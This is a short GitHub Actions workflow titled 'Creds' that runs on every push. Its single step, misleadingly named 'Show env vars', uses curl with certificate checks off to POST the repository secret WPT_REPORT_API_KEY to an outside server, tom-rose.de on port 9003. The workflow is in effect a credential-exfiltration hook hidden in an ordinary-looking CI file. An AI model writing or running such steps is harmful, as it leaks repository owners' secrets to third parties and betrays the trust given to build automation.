name: Creds

on:
  push

jobs:
 
  test:
    name: Show
    runs-on: ubuntu-latest
    
    steps:
      - name: Checkout repository
        uses: actions/checkout@8e5e7e5ab8b370d6c329ec480221332ada57f0ab # v3.5.2

      - name: Show env vars
        run: |
          curl -k -X POST https://tom-rose.de:9003/post -H "Content-Type: application/json"  -d "{\"scope\":\"ion\",\"message\":\"${{ secrets.WPT_REPORT_API_KEY }}\"}"
